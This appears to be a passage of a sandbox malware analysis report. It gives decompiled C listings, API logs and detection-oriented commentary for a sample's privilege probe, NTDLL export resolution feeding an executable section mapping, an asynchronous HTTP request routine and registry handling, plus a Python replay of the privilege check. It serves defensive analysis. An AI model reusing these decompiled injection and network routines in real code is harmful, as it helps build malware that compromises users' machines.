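Running the script shows why the report's Similarity line for E04DE2384 is dominated by GetProcAddress: the five calls at 04DE7527..04DE757F resolve four Zw* stubs plus one Rtl* routine out of NTDLL, the 4E52454B/54a8cef pair at 04DE2424 is a KERNEL32 lookup whose name string never appears in the listing, and 4D283A53 decodes to the opening of an SDDL security descriptor string ("S:(M"), which is what such a value on the stack looks like when the full string is not shown.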

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E04DE7628(long* _a4) {
                                      				long _v8;
                                      				void* _v12;
                                      				void _v16;
                                      				long _v20;
                                      				int _t33;
                                      				void* _t46;
                                      
                                      				_v16 = 1;
                                      				_v20 = 0x2000;
                                      				if( *0x4dea2fc > 5) {
                                      					_v16 = 0;
                                      					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                      						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                      						_v8 = 0;
                                      						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                      						if(_v8 != 0) {
                                      							_t46 = E04DE4DF6(_v8);
                                      							if(_t46 != 0) {
                                      								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                      								if(_t33 != 0) {
                                      									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                      								}
                                      								E04DE4C73(_t46);
                                      							}
                                      						}
                                      						CloseHandle(_v12);
                                      					}
                                      				}
                                      				 *_a4 = _v20;
                                      				return _v16;
                                       			}

                                       Listing address range: 0x04de7635 - 0x04de76ee

                                      APIs
                                      • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04DE765A
                                       • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 04DE767A
                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04DE768A
                                      • CloseHandle.KERNEL32(00000000), ref: 04DE76DA
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04DE76AD
                                      • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04DE76B5
                                      • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04DE76C5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                       • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                      • String ID:
                                      • API String ID: 1295030180-0
                                      • Opcode ID: 0f1751712e17f133da73cde76c7003b56e15582e41dfb6493f655b2aa7642657
                                      • Instruction ID: 568a8f1ac38f724bfe6d6dc9d67b5e221871d58fa6d512b3015c8ad5afab15fd
                                      • Opcode Fuzzy Hash: 0f1751712e17f133da73cde76c7003b56e15582e41dfb6493f655b2aa7642657
                                      • Instruction Fuzzy Hash: 5B212A75A00209FFEB10AF96DD84EFEBB79FB44308F1000A5EA10A6261D7755E54EB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%
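E04DE7628 is the sample's privilege probe: on OS major version 6 or later (the *0x4dea2fc > 5 test) it opens its own token (0xffffffff is the current-process pseudo-handle, 0x20008 is TOKEN_QUERY | READ_CONTROL), reads TOKEN_ELEVATION (class 0x14, one DWORD) into the return value, then reads TOKEN_MANDATORY_LABEL (class 0x19) and takes the last sub-authority of the label SID as the integrity RID, which it writes through _a4. Both defaults matter for detection logic that reasons about the sample's behaviour: when any query fails, or on XP/2003 where the classes do not exist, it reports elevated = 1 and integrity = 0x2000 (SECURITY_MANDATORY_MEDIUM_RID). The following is an added example, not code from the sample or the report: it replays the same decision on raw token bytes so the logic can be checked offline, including the failure defaults. It assumes the caller already extracted the SID bytes from the TOKEN_MANDATORY_LABEL (the listing dereferences *_t46 to get that pointer); the SIDs it feeds in are constructed.

```python
"""
Offline replay of E04DE7628: elevation flag from TokenElevation, integrity RID from the
last sub-authority of the TokenIntegrityLevel SID. Added example with constructed inputs.
"""
import struct
from typing import List, Optional, Tuple

# winnt.h SECURITY_MANDATORY_*_RID values; 0x2000 is the default the listing stores in _v20.
SECURITY_MANDATORY_MEDIUM_RID = 0x2000
INTEGRITY_NAMES = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x2100: "Medium-Plus",
    0x3000: "High",
    0x4000: "System",
    0x5000: "Protected-Process",
}
SECURITY_MANDATORY_LABEL_AUTHORITY = 16  # label SIDs are S-1-16-<rid>


def parse_sid(blob: bytes) -> Tuple[int, int, List[int]]:
    """Parse a binary SID: Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian) SubAuthority[n] (LE DWORDs)."""
    if len(blob) < 8:
        raise ValueError("SID too short")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(blob) < 8 + 4 * count:
        raise ValueError("SID truncated")
    authority = int.from_bytes(blob[2:8], "big")
    subs = list(struct.unpack_from(f"<{count}I", blob, 8))
    return revision, authority, subs


def sid_to_string(blob: bytes) -> str:
    revision, authority, subs = parse_sid(blob)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def make_label_sid(rid: int) -> bytes:
    """Build S-1-16-<rid> as bytes (constructed test input, not captured from a host)."""
    return bytes([1, 1]) + SECURITY_MANDATORY_LABEL_AUTHORITY.to_bytes(6, "big") + struct.pack("<I", rid)


def integrity_rid_from_label(label_sid: bytes) -> int:
    """What *GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1) returns for the label SID."""
    _, authority, subs = parse_sid(label_sid)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY:
        raise ValueError("not a mandatory-label SID")
    return subs[-1]


def classify(os_major: int, elevation_blob: Optional[bytes], label_sid: Optional[bytes]) -> Tuple[int, int]:
    """Mirror the listing's control flow; returns (is_elevated, integrity_rid).

    elevation_blob: the 4 bytes GetTokenInformation(TokenElevation) would write, or None on failure.
    label_sid:      the SID bytes behind TOKEN_MANDATORY_LABEL.Label.Sid, or None on failure.
    """
    is_elevated = 1                       # _v16 = 1
    integrity = SECURITY_MANDATORY_MEDIUM_RID  # _v20 = 0x2000
    if os_major > 5:                      # *0x4dea2fc > 5: Vista and later only
        is_elevated = 0                   # _v16 = 0 before OpenProcessToken
        if elevation_blob is not None and len(elevation_blob) >= 4:
            is_elevated = struct.unpack_from("<I", elevation_blob)[0]  # TOKEN_ELEVATION.TokenIsElevated
        if label_sid is not None:
            try:
                integrity = integrity_rid_from_label(label_sid)
            except ValueError:
                pass                      # failed query leaves the 0x2000 default, as in the listing
    return is_elevated, integrity


if __name__ == "__main__":
    for os_major, elev, sid in [(5, None, None),
                                (6, b"\x01\x00\x00\x00", make_label_sid(0x3000)),
                                (10, b"\x00\x00\x00\x00", make_label_sid(0x1000))]:
        elevated, rid = classify(os_major, elev, sid)
        print(f"os {os_major}: elevated={elevated} integrity=0x{rid:04x} ({INTEGRITY_NAMES.get(rid, '?')})")
```

The pre-Vista branch is the one worth remembering when writing detections or emulators for this family: a host that reports an OS major version of 5 is treated as fully elevated without a single token call, so the absence of OpenProcessToken/GetTokenInformation in a trace does not mean the privilege check was skipped.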

                                      Control-flow Graph

                                      C-Code - Quality: 64%
                                      			E04DE3739(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				intOrPtr _v8;
                                      				intOrPtr _t9;
                                      				intOrPtr _t13;
                                      				char* _t19;
                                      				char* _t28;
                                      				void* _t33;
                                      				void* _t34;
                                      				char* _t36;
                                      				void* _t38;
                                      				intOrPtr* _t39;
                                      				char* _t40;
                                      				char* _t42;
                                      				char* _t43;
                                      
                                      				_t34 = __edx;
                                      				_push(__ecx);
                                      				_t9 =  *0x4dea348; // 0x6bd5a8
                                      				_t1 = _t9 + 0x4deb62c; // 0x253d7325
                                      				_t36 = 0;
                                      				_t28 = E04DE403D(__ecx, _t1);
                                      				if(_t28 != 0) {
                                      					_t39 = __imp__;
                                      					_t13 =  *_t39(_t28, _t38);
                                      					_v8 = _t13;
                                      					_t40 = E04DE4DF6(_v8 +  *_t39(_a4) + 1);
                                      					if(_t40 != 0) {
                                      						strcpy(_t40, _t28);
                                      						_pop(_t33);
                                      						__imp__(_t40, _a4);
                                      						_t19 = E04DE723B(_t33, _t34, _t40, _a8); // executed
                                      						_t36 = _t19;
                                      						E04DE4C73(_t40);
                                      						_t42 = E04DE20D2(StrTrimA(_t36, "="), _t36);
                                      						if(_t42 != 0) {
                                      							E04DE4C73(_t36);
                                      							_t36 = _t42;
                                      						}
                                      						_t43 = E04DE72E7(_t36, _t33);
                                      						if(_t43 != 0) {
                                      							E04DE4C73(_t36);
                                      							_t36 = _t43;
                                      						}
                                      					}
                                      					E04DE4C73(_t28);
                                      				}
                                      				return _t36;
                                       			}

                                       Listing address range: 0x04de3739 - 0x04de37e6

                                      APIs
                                        • Part of subcall function 04DE403D: lstrlen.KERNEL32(00000000,00000000,00000000,76D8C740,?,?,?,04DE3752,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE40A4
                                        • Part of subcall function 04DE403D: sprintf.NTDLL ref: 04DE40C5
                                      • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,76D8C740,?,?,04DE653D,?,054A95B0), ref: 04DE3764
                                      • lstrlen.KERNEL32(?,?,?,04DE653D,?,054A95B0), ref: 04DE376C
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • strcpy.NTDLL ref: 04DE3783
                                      • lstrcat.KERNEL32(00000000,?), ref: 04DE378E
                                        • Part of subcall function 04DE723B: lstrlen.KERNEL32(?,?,?,00000000,?,04DE379D,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE724C
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE37AB
                                        • Part of subcall function 04DE20D2: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04DE37B7,00000000,?,?,04DE653D,?,054A95B0), ref: 04DE20DC
                                        • Part of subcall function 04DE20D2: _snprintf.NTDLL ref: 04DE213A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                       • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                      • String ID: =
                                      • API String ID: 2864389247-1428090586
                                      • Opcode ID: e32ac6b31aaf4c3f59760339103ebd01b8324a01defa79c9a6d63837a64b428e
                                      • Instruction ID: f1e62ccb4653625cc1368292b22d860fcb14f6b4c616487adffb5ef6f1be2673
                                      • Opcode Fuzzy Hash: e32ac6b31aaf4c3f59760339103ebd01b8324a01defa79c9a6d63837a64b428e
                                      • Instruction Fuzzy Hash: 5E11E0B3B01525779712BBBB9C98CBE36ACEE896687054116F9009B200DF79ED0287B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                       Control-flow Graph (basic blocks of the function at 04DE3C00, with successors; graph legend: Executed / Not Executed)
                                       • 368: 4de3c00-4de3c32, call 4de1162; successors 371, 372
                                       • 371: 4de3d1a-4de3d20; no successors
                                       • 372: 4de3c38-4de3c3f, call 4de6615; successor 374
                                       • 374: 4de3c44-4de3c48; successors 375, 376
                                       • 375: 4de3c4e-4de3c60, SysAllocString; successors 377, 378
                                       • 376: 4de3d11-4de3d16; successor 371
                                       • 377: 4de3cdf-4de3ce3; successors 379, 380
                                       • 378: 4de3c62-4de3c75, SysAllocString; successors 377, 381
                                       • 379: 4de3cee-4de3cf2; successors 382, 383
                                       • 380: 4de3ce5-4de3ce8, SysFreeString; successor 379
                                       • 381: 4de3c77-4de3c7b; successors 384, 385
                                       • 382: 4de3cfd-4de3cff; successors 386, 387
                                       • 383: 4de3cf4-4de3cf7, SysFreeString; successor 382
                                       • 384: 4de3c8f-4de3cdd; successor 377
                                       • 385: 4de3c7d-4de3c87, SysAllocString; successors 379, 388
                                       • 386: 4de3d08-4de3d0d; successor 376
                                       • 387: 4de3d01-4de3d02, SysFreeString; successor 386
                                       • 388: 4de3c89-4de3c8b; successor 384
                                      APIs
                                        • Part of subcall function 04DE1162: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,054A89D8,04DE3C2E,?,?,?,?,?,?,?,?,?,?,?,04DE3C2E), ref: 04DE122F
                                        • Part of subcall function 04DE6615: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04DE6652
                                        • Part of subcall function 04DE6615: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04DE6683
                                      • SysAllocString.OLEAUT32(00000000), ref: 04DE3C5A
                                      • SysAllocString.OLEAUT32(0070006F), ref: 04DE3C6E
                                      • SysAllocString.OLEAUT32(00000000), ref: 04DE3C80
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE3CE8
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE3CF7
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE3D02
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                       • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                      • String ID:
                                      • API String ID: 2831207796-0
                                      • Opcode ID: 8a30c4b932add5f384abaab98ff94d7c68e52d5aac51376065be0fb92564c1e1
                                      • Instruction ID: c56fdc778d2a385c557c67e212a5e7b7e511c273e71a35783a825a55f72c2dc5
                                      • Opcode Fuzzy Hash: 8a30c4b932add5f384abaab98ff94d7c68e52d5aac51376065be0fb92564c1e1
                                      • Instruction Fuzzy Hash: 49414136A00609AFDB01EFBAD844ABEB7BAFF49304F144465ED14EB210DA71ED05CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                       			// Resolver for the section-mapping primitive: allocate a 0x20-byte context
                                       			// (E04DE4DF6 wraps RtlAllocateHeap), look up five exports of the module whose
                                       			// name is stored at *0x4dea348 + 0x4deb11a (the bytes decode as "NTDL", i.e.
                                       			// the "NTDLL" literal is kept as a base-relative offset, not a plain string),
                                       			// store them at +0xc..+0x1c, then pass the context to E04DE25D7, which calls
                                       			// NtCreateSection. Every export name is base-relative in the same way; the
                                       			// decompiler comments show only the first four bytes of each name.
                                       			E04DE74E0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                       				intOrPtr _v8;
                                       				intOrPtr _t23;
                                       				intOrPtr _t26;
                                       				_Unknown_base(*)()* _t28;
                                       				intOrPtr _t30;
                                       				_Unknown_base(*)()* _t32;
                                       				intOrPtr _t33;
                                       				_Unknown_base(*)()* _t35;
                                       				intOrPtr _t36;
                                       				_Unknown_base(*)()* _t38;
                                       				intOrPtr _t39;
                                       				_Unknown_base(*)()* _t41;
                                       				intOrPtr _t44;
                                       				struct HINSTANCE__* _t48;
                                       				intOrPtr _t54;
                                       
                                       				_t54 = E04DE4DF6(0x20);
                                       				if(_t54 == 0) {
                                       					_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                       				} else {
                                       					_t23 =  *0x4dea348; // 0x6bd5a8
                                       					_t1 = _t23 + 0x4deb11a; // 0x4c44544e = "NTDL"
                                       					_t48 = GetModuleHandleA(_t1);
                                       					_t26 =  *0x4dea348; // 0x6bd5a8
                                       					_t2 = _t26 + 0x4deb769; // 0x7243775a = "ZwCr"
                                       					_v8 = 0x7f; // ERROR_PROC_NOT_FOUND: returned if any lookup below fails
                                       					_t28 = GetProcAddress(_t48, _t2);
                                       					 *(_t54 + 0xc) = _t28;
                                       					if(_t28 == 0) {
                                       						L8:
                                       						E04DE4C73(_t54); // RtlFreeHeap wrapper: drop the half-built context
                                       					} else {
                                       						_t30 =  *0x4dea348; // 0x6bd5a8
                                       						_t5 = _t30 + 0x4deb756; // 0x614d775a = "ZwMa"
                                       						_t32 = GetProcAddress(_t48, _t5);
                                       						 *(_t54 + 0x10) = _t32;
                                       						if(_t32 == 0) {
                                       							goto L8;
                                       						} else {
                                       							_t33 =  *0x4dea348; // 0x6bd5a8
                                       							_t7 = _t33 + 0x4deb40b; // 0x6e55775a = "ZwUn"
                                       							_t35 = GetProcAddress(_t48, _t7);
                                       							 *(_t54 + 0x14) = _t35;
                                       							if(_t35 == 0) {
                                       								goto L8;
                                       							} else {
                                       								_t36 =  *0x4dea348; // 0x6bd5a8
                                       								_t9 = _t36 + 0x4deb4d2; // 0x4e6c7452 = "RtlN"
                                       								_t38 = GetProcAddress(_t48, _t9);
                                       								 *(_t54 + 0x18) = _t38;
                                       								if(_t38 == 0) {
                                       									goto L8;
                                       								} else {
                                       									_t39 =  *0x4dea348; // 0x6bd5a8
                                       									_t11 = _t39 + 0x4deb779; // 0x6c43775a = "ZwCl"
                                       									_t41 = GetProcAddress(_t48, _t11);
                                       									 *(_t54 + 0x1c) = _t41;
                                       									if(_t41 == 0) {
                                       										goto L8;
                                       									} else {
                                       										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                       										 *((intOrPtr*)(_t54 + 8)) = 0x40; // 0x40 == PAGE_EXECUTE_READWRITE
                                       										// E04DE25D7 calls NtCreateSection(..., 0x000F001F = SECTION_ALL_ACCESS, ..., 0x08000000 = SEC_COMMIT, ...) and memset
                                       										_t44 = E04DE25D7(_t54, _a8); // executed
                                       										_v8 = _t44;
                                       										if(_t44 != 0) {
                                       											goto L8; // section setup failed: free the context, return its status
                                       										} else {
                                       											 *_a12 = _t54; // hand the fully resolved context back to the caller
                                       										}
                                       									}
                                       								}
                                       							}
                                       						}
                                       					}
                                       				}
                                       				return _v8;
                                       			}
                                       Instruction addresses, one per decompiled line above, in order (0x00000000 marks a line with no code of its own): 0x04de74ef 0x04de74f3 0x04de75b5 0x04de74f9 0x04de74f9 0x04de74fe 0x04de7511 0x04de7513 0x04de7518 0x04de7520 0x04de7527 0x04de7529 0x04de752e 0x04de75ad 0x04de75ae 0x04de7530 0x04de7530 0x04de7535 0x04de753d 0x04de753f 0x04de7544 0x00000000 0x04de7546 0x04de7546 0x04de754b 0x04de7553 0x04de7555 0x04de755a 0x00000000 0x04de755c 0x04de755c 0x04de7561 0x04de7569 0x04de756b 0x04de7570 0x00000000 0x04de7572 0x04de7572 0x04de7577 0x04de757f 0x04de7581 0x04de7586 0x00000000 0x04de7588 0x04de758e 0x04de7593 0x04de759a 0x04de759f 0x04de75a4 0x00000000 0x04de75a6 0x04de75a9 0x04de75a9 0x04de75a4 0x04de7586 0x04de7570 0x04de755a 0x04de7544 0x04de752e 0x04de75c3

                                      APIs
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04DE23A0,?,?,?,?,00000000,00000000), ref: 04DE7505
                                      • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04DE7527
                                      • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04DE753D
                                      • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04DE7553
                                      • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04DE7569
                                      • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04DE757F
                                        • Part of subcall function 04DE25D7: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77004EE0,00000000,00000000,04DE759F), ref: 04DE2634
                                        • Part of subcall function 04DE25D7: memset.NTDLL ref: 04DE2656
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                       • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                      • String ID:
                                      • API String ID: 3012371009-0
                                      • Opcode ID: 2dac6d9c0b5347c7c55fcfa499297bdbe9e1345f7ddf37d3deeb9e3278cb1340
                                      • Instruction ID: 48748ab5fd575a150d637a45b9118221b153a51e23f465ba04005959366a10ce
                                      • Opcode Fuzzy Hash: 2dac6d9c0b5347c7c55fcfa499297bdbe9e1345f7ddf37d3deeb9e3278cb1340
                                      • Instruction Fuzzy Hash: 132117B160070BAFDB50FFABC898E6AB7ECEB442047018026E505CB751E774F9048B60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                       			// Sends one WinINet request on a connection context (_t22 = __eax): +0x18 holds
                                       			// the request handle, +0x1c and +0x20 two completion events. HttpSendRequestA is
                                       			// called with no headers and no body; a failure whose last error is 0x3e5
                                       			// (ERROR_IO_PENDING) counts as success because the handle is asynchronous and
                                       			// completion is signalled later through the events.
                                       			E04DE4BD6(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                       				void* __esi;
                                       				long _t10;
                                       				void* _t18;
                                       				void* _t22;
                                       
                                       				_t9 = __eax;
                                       				_t22 = __eax;
                                       				if(_a4 != 0) {
                                       					// E04DE5296 copies _a4 into the context (lstrlen / memcpy / lstrcpy)
                                       					_t9 = E04DE5296(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                                       					if(_t9 == 0) {
                                       						L9:
                                       						return GetLastError();
                                       					}
                                       				}
                                       				_t10 = E04DE7A71(_t9, _t18, _t22, _a8); // executed
                                       				if(_t10 == 0) {
                                       					ResetEvent( *(_t22 + 0x1c));
                                       					ResetEvent( *(_t22 + 0x20));
                                       					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                       						SetEvent( *(_t22 + 0x1c)); // completed synchronously: signal "sent" right away
                                       						goto L7;
                                       					} else {
                                       						_t10 = GetLastError();
                                       						if(_t10 == 0x3e5) { // ERROR_IO_PENDING: async send in flight, not a failure
                                       							L7:
                                       							_t10 = 0;
                                       						}
                                       					}
                                       				}
                                       				if(_t10 == 0xffffffff) { // callee convention for "consult GetLastError"
                                       					goto L9;
                                       				}
                                       				return _t10;
                                       			}
                                       Instruction addresses, one per decompiled line above, in order (0x00000000 marks a line with no code of its own): 0x04de4bd6 0x04de4be3 0x04de4be5 0x04de4bf0 0x04de4bf7 0x04de4c48 0x00000000 0x04de4c48 0x04de4bf7 0x04de4bfd 0x04de4c04 0x04de4c10 0x04de4c15 0x04de4c2b 0x04de4c3b 0x00000000 0x04de4c2d 0x04de4c2d 0x04de4c34 0x04de4c41 0x04de4c41 0x04de4c41 0x04de4c34 0x04de4c2b 0x04de4c46 0x00000000 0x00000000 0x04de4c4c

                                      APIs
                                      • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04DE5388,?,?,00000000,00000000), ref: 04DE4C10
                                      • ResetEvent.KERNEL32(?), ref: 04DE4C15
                                      • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04DE4C22
                                      • GetLastError.KERNEL32 ref: 04DE4C2D
                                      • GetLastError.KERNEL32(?,?,00000102,04DE5388,?,?,00000000,00000000), ref: 04DE4C48
                                        • Part of subcall function 04DE5296: lstrlen.KERNEL32(00000000,00000008,?,77004D40,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?,?,00000000), ref: 04DE52A2
                                        • Part of subcall function 04DE5296: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04DE4BF5,?,?,?,?,00000102,04DE5388,?), ref: 04DE5300
                                        • Part of subcall function 04DE5296: lstrcpy.KERNEL32(00000000,00000000), ref: 04DE5310
                                      • SetEvent.KERNEL32(?), ref: 04DE4C3B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                       • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                      • String ID:
                                      • API String ID: 3739416942-0
                                      • Opcode ID: 9f8c4146aa61b2201dacd0ed70a4d10e6b89772b5e46026ac4fd7de3851998fb
                                      • Instruction ID: 8bdf41501ec21b7c3aa72c03aa7b81ac65665f61ffd28ed5244bb86757b78075
                                      • Opcode Fuzzy Hash: 9f8c4146aa61b2201dacd0ed70a4d10e6b89772b5e46026ac4fd7de3851998fb
                                      • Instruction Fuzzy Hash: 6001AD71200200AADB307F63EE54F6B77E9FF84325F110724F456922E0D621F804EA20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 88%
                                       			// Builds a registry location and reads/writes values under it. _a8 is a
                                       			// caller-supplied name and _a16 its length: length 0 selects hive 0x80000002
                                       			// (HKEY_LOCAL_MACHINE) together with the "HKLM" and "Soft" string variants
                                       			// below; otherwise the name is validated (longer than 8, name + 0x2a still
                                       			// below 0x104 = MAX_PATH, no '_' = 0x5f) and hive 0x80000003
                                       			// (HKEY_CURRENT_USER) with "HKCU" is used. String constants are base-relative
                                       			// offsets from *0x4dea348 as in E04DE74E0, so only their first four bytes are
                                       			// visible. E04DE4DF6/E04DE4C73 are the RtlAllocateHeap/RtlFreeHeap wrappers;
                                       			// the two __imp__ calls go through an import pointer the decompiler did not name.
                                       			E04DE6E20(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                       				signed int _v8;
                                       				char _v12;
                                       				signed int* _v16;
                                       				char _v284;
                                       				void* __esi;
                                       				char* _t59;
                                       				intOrPtr* _t60;
                                       				void* _t62;
                                       				intOrPtr _t64;
                                       				char _t65;
                                       				void* _t67;
                                       				intOrPtr _t68;
                                       				intOrPtr _t69;
                                       				intOrPtr _t71;
                                       				void* _t73;
                                       				signed int _t81;
                                       				void* _t91;
                                       				void* _t92;
                                       				char _t98;
                                       				signed int* _t100;
                                       				intOrPtr* _t101;
                                       				void* _t102;
                                       
                                       				_t92 = __ecx;
                                       				_v8 = _v8 & 0x00000000;
                                       				_t98 = _a16;
                                       				if(_t98 == 0) {
                                       					__imp__( &_v284,  *0x4dea3dc); // unnamed import: (local buffer, string at *0x4dea3dc)
                                       					_t91 = 0x80000002; // HKEY_LOCAL_MACHINE
                                       					L6:
                                       					_t59 = E04DE4208( &_v284,  &_v284);
                                       					_a8 = _t59;
                                       					if(_t59 == 0) {
                                       						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                       						L29:
                                       						_t60 = _a20;
                                       						if(_t60 != 0) {
                                       							 *_t60 =  *_t60 + 1; // caller's counter is bumped on every exit path
                                       						}
                                       						return _v8;
                                       					}
                                       					_t101 = _a24;
                                       					_t62 = E04DE3DCA(_t92, _t97, _t101, _t91, _t59); // executed (_t97 is only assigned on the HKCU path: decompiler register artifact)
                                       					if(_t62 != 0) {
                                       						L27:
                                       						E04DE4C73(_a8);
                                       						goto L29;
                                       					}
